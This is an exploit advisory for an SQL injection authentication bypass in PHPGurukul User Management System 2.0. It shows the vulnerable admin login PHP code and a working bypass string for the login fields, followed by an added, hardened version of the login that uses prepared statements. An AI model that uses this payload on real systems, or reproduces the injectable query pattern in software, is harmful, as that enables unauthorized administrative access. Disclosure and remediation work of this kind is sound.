## https://sploitus.com/exploit?id=PACKETSTORM:157361
# Exploit Title: User Management System 2.0 - Authentication Bypass  
# Author: Besim ALTINOK  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/  
# Version: v2.0  
# Tested on: Xampp  
# Credit: İsmail BOZKURT  
  
  
------ Details:  
  
1- Vulnerable code is here (admin login: /admin/index.php):  
  
<?php  
session_start();  
include("dbconnection.php");  
if(isset($_POST['login']))  
{  
$adminusername=$_POST['username'];  
$pass=md5($_POST['password']);  
$ret=mysqli_query($con,"SELECT * FROM admin WHERE  
username='$adminusername' and password='$pass'");  
$num=mysqli_fetch_array($ret);  
if($num>0)  
{  
$extra="manage-users.php";  
$_SESSION['login']=$_POST['username'];  
$_SESSION['id']=$num['id'];  
echo "<script>window.location.href='".$extra."'</script>";  
exit();  
}  
else  
{  
$_SESSION['action1']="*Invalid username or password";  
$extra="index.php";  
echo "<script>window.location.href='".$extra."'</script>";  
exit();  
}  
}  
  
2- We can bypass authentication with SQLi:  
  
Bypass code (user and admin login panel):  
  
Username: pentester' or'1'=1#  
Password : pentester' or'1'=1#  
  
Finally: Many inputs in this project are vulnerable to SQLi, such as login,  
registration, forgot password ...
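
A hardened form of the admin login check from step 1, as an added example that is not part of the original advisory or the vendor's code. It assumes dbconnection.php defines $con as a mysqli connection and that the admin table has id, username and password columns, as the vulnerable code implies; the header() redirects replace the original script-tag redirects.

```php
<?php
// Added example: parameterized rewrite of the /admin/index.php login check.
// Assumes $con is the mysqli connection from dbconnection.php and that the
// admin table has id, username and password columns (as in the code above).
session_start();
include("dbconnection.php");

if (isset($_POST['login'])) {
    // Cast to string so array-valued POST fields cannot reach md5() or the query.
    $adminusername = (string)($_POST['username'] ?? '');
    // md5 is kept only to match the hashes the existing table stores.
    $pass = md5((string)($_POST['password'] ?? ''));

    // Placeholders keep user input out of the SQL text, so quotes and
    // comment characters in the username are compared as plain data.
    $stmt = mysqli_prepare(
        $con,
        "SELECT id, username FROM admin WHERE username = ? AND password = ?"
    );
    if ($stmt === false) {
        http_response_code(500);
        exit();
    }
    mysqli_stmt_bind_param($stmt, "ss", $adminusername, $pass);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_bind_result($stmt, $id, $username);
    $found = mysqli_stmt_fetch($stmt);   // true on a row, null when none matched
    mysqli_stmt_close($stmt);

    if ($found === true) {
        session_regenerate_id(true);     // issue a fresh session id on login
        $_SESSION['login'] = $username;  // value from the database row, not from POST
        $_SESSION['id'] = $id;
        header("Location: manage-users.php");
        exit();
    }

    $_SESSION['action1'] = "*Invalid username or password";
    header("Location: index.php");
    exit();
}
```

With this version the string from step 2 is bound as a literal username, matches no row, and the request falls through to the invalid-login branch.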